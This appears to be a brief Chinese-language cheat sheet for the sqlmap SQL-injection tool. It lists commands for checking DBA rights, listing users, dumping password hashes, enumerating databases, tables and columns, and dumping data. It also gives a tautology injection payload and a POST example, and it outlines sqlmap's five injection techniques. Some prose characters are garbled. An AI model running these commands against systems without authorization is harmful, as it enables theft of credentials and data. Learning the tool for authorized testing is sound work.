SQLmap
SQLmap常用语法:
1.判断当前用户是否是dba(数据库管理员):
python sqlmap.py -u “url” –is-dba
2.–users:列出数据库管理系统用户:
python sqlmap.py -u “url” –users
3.–passwords:数据库用户密码(hash)
python sqlmap.py -u “url” –passwords
python sqlmap.py -u “url” –passwords -U sa
4.查看用户权限
python sqlmap.py -u “url” –privileges
python sqlmap.py -u “url” –privileges -U postgres
5.–dbs可以利用的数据库
python sqlmap.py -u “url” –dbs
6.–tables列数据库表
python sqlmap.py -u “url” –tables -D “db_name”
-D:指定数据库名称
7.–columns查看列名
python sqlmap.py -u “url” –columns -T “table_name” -D “db_name”
8.–dump -C “column1_name,column2_name,column3_name” 查询字段数据
python sqlmap.py -u “url” –dump -C “column1_name,column2_name” -T “table_name” -D “db_name”
–prefix “\'” –suffix ” or \’1\’=\’1 — “
sqlmap -u “sssslog.asp” –data “user_id=eee&password=eee&Submit=%B5%C7+%C2%BC”
当给sqlmap这么一个url的时候,它会:
1 、判断可注入的参数
2 、判断可以用那种SQL 注入技术来注入
3 、识别出哪种数据库
4、根据用户选择, 读取哪些数据
sqlmap支持五种不同的注入模式:
1 、基于布尔的盲注, 即可以根据返回页面判断条件真假的注入:
2 、基于时间的盲注, 即不能根据页面返回内容判断任何信昷, 用条件语句查看时间延迟语句是否执行( 即页面返回时间是否增加〕来判断:
3 、基于报错注入, 即页面会返回错误信昷, 或者把注入的语句的结果亘接返回在页面中:
4、 联合查询注入, 可以亻吏用union 的情况下的注入:
5 、堆查询注入, 可以同时执行多条语句的执行时的注入:
以下是我在网上找到的关于sqlmap写的比较好的文章:
https://www.freebuf.com/sectool/179035.html